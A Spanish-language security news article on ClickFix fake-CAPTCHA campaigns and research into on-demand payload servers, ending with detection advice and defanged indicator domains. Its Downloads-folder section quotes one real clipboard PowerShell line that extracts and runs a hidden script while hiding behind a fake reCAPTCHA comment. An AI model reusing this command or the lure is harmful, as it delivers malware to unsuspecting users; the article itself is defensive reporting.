ClickFix, la técnica que engaña a los usuarios para que ejecuten malware manualmente, ha desarrollado silenciosamente una infraestructura de back-office. Una nueva investigación muestra que los comandos maliciosos detrás de sus páginas falsas de «demuestra que eres humano» ahora son distribuidos por servidores basados en API, que entregan a cada visitante el mismo malware con un disfraz diferente. El mismo estudio también descubrió un nuevo método de entrega diseñado para evadir el escaneo de scripts de Windows.
El investigador de seguridad Bert-Jan Pals desmontó varias plataformas ClickFix y analizó aproximadamente 3,000 cargas útiles de campañas activas. Presentó sus hallazgos en OrangeCon a principios de junio y publicó los detalles el 30 de junio.
El funcionamiento de ClickFix
ClickFix es simple por diseño. Una página maliciosa muestra un CAPTCHA o error falso, un JavaScript oculto copia un comando en el portapapeles del usuario, y la página le indica que presione una combinación de teclas, pegue y presione Enter. El usuario ejecuta el malware por sí mismo. Generalmente no hay exploit en el primer paso ni archivo que el antivirus tradicional pueda detectar, por lo que los controles convencionales de correo electrónico y endpoints tienen menos elementos para interceptar.
La técnica funciona lo suficientemente bien como para que ESET midiera un aumento del 517% desde finales de 2024 hasta la primera mitad de 2025, y el Informe de Defensa Digital 2025 de Microsoft la situara en el 47% de los casos de acceso inicial vistos por su equipo de Defender Experts. La técnica tiene ahora su propia entrada en MITRE ATT&CK, T1204.004.
Cargas útiles bajo demanda
La novedad es cómo se producen las cargas útiles. Pals descubrió que las páginas obtienen sus comandos de servidores backend que funcionan como un servicio bajo demanda: reciben solicitudes, verifican un token de acceso, registran al usuario y devuelven un comando recién ofuscado cada vez. Solicitó 100 cargas a un servidor y obtuvo 100 diferentes, envueltas en una combinación rotatoria de Base64, AES, TripleDES, Rijndael y Deflate. Al quitar la envoltura, al menos por ahora, todas se desempaquetan en el mismo script, que se ejecuta en memoria a través de un runspace de PowerShell.
El disfraz es desechable; el malware subyacente no lo es, aunque Pals advierte que es probable que la carga principal comience a cambiar por víctima antes de mucho tiempo. La misma plataforma sirve señuelos en 25 idiomas y adapta el comando al sistema operativo del visitante, con versiones de macOS junto a Windows.
La etiqueta «como servicio» no es solo marketing. ESET ha rastreado a criminales que venden constructores ClickFix listos para usar a otros atacantes. Pals encontró una comercialización paralela un nivel más profundo, en cómo cada carga se genera bajo demanda.
Un método de entrada más silencioso: la carpeta de Descargas
El segundo hallazgo es una respuesta directa a los defensores que vigilan el portapapeles. En lugar de copiar un comando malicioso, las páginas más nuevas copian uno inofensivo. La página descarga silenciosamente un archivo a la carpeta de Descargas, y el portapapeles recibe una línea corta de «orquestador» que mueve ese archivo, lo descomprime y ejecuta el script interno. Dado que la línea pegada es solo ese orquestador y no la carga útil, está diseñada para evadir AMSI, la función de Windows que permite a los antivirus escanear scripts antes de ejecutarlos. El código malicioso reside en el archivo descargado, apartado.
La línea observada en el portapapeles fue: powershell -C "$t=$env:TMP;Move-Item \"$HOME\Downloads\tmp.zip\" \"$t\7947.zip\";tar -xf \"$t\7947.zip\" -C \"$t\";conhost --headless powershell -ExecutionPolicy Bypass -File \"$t\tmp.ps1\" # \"* I am not a robot reCAPTCHA Verification ID:7947 *\"
La ejecución también se ha vuelto más sigilosa. La variante original de 2024 indicaba a los usuarios presionar Windows+R y pegar en el cuadro de Ejecutar. Una versión más reciente, común durante 2025 y entrando en 2026, los dirige a Windows+X y a Windows Terminal. El uso de Terminal parece más normal y, a diferencia del cuadro de Ejecutar, no deja rastro en la clave de registro RunMRU que los investigadores suelen revisar.
ClickFix dejó de ser una herramienta exclusiva de criminales hace tiempo. Proofpoint vinculó a grupos patrocinados por estados de Rusia, Irán y Corea del Norte, incluyendo APT28, MuddyWater y Kimsuky, con campañas que insertaron ClickFix en sus cadenas de infección existentes, y grupos norcoreanos crearon una versión de «ClickFake Interview» para atacar a trabajadores de criptomonedas.
La técnica ha generado variantes nombradas como FileFix y DownloadFix que se apoyan en otras herramientas confiables de Windows. La escala no es teórica: la firma de seguridad Expel encontró una ola de ClearFake que probablemente infectó hasta 147,521 sistemas desde finales de agosto de 2025.
Lo que los defensores deben vigilar
La lección defensiva no ha cambiado, pero los detalles sí. Las señales confiables son las cadenas de procesos, no el texto del portapapeles: explorer.exe o WindowsTerminal.exe lanzando powershell.exe, cmd.exe o msiexec.exe y contactando la red justo después. Esos fueron los lanzadores más comunes en los datos de Pals, con PowerShell y cmd empatados en aproximadamente 39% cada uno y msiexec cerca con 34%.
EDR conductual, reglas de control de aplicaciones que limiten qué programas pueden llamar a intérpretes de scripts, y la simple guía al usuario («nunca pegues un comando que te hayan dicho que ejecutes en el cuadro de Ejecutar o en un terminal») siguen siendo válidos. El método de la carpeta de Descargas agrega un elemento más a cazar: una línea de una sola frase que toque la carpeta de Descargas y luego genere un PowerShell oculto.
- Servidores de carga útil identificados:
- - comicstar[.]lat
- - babybon[.]cfd
- - merkantalolol[.]asia
Una conexión a uno de estos no prueba una infección, pero significa que lo más probable es que se haya colocado un comando en el portapapeles de alguien.
El veredicto de Pals sobre la técnica es contundente: «ClickFix ha llegado para quedarse».
El patrón en su investigación es que ClickFix se desplaza en cuanto los defensores se ponen al día, y el paso de scripts únicos a servidores de cargas bajo demanda es lo que mantiene esa adaptación barata de repetir. Lo próximo que vale la pena observar es si el malware en sí mismo, no solo su envoltorio, comienza a cambiar de una víctima a otra.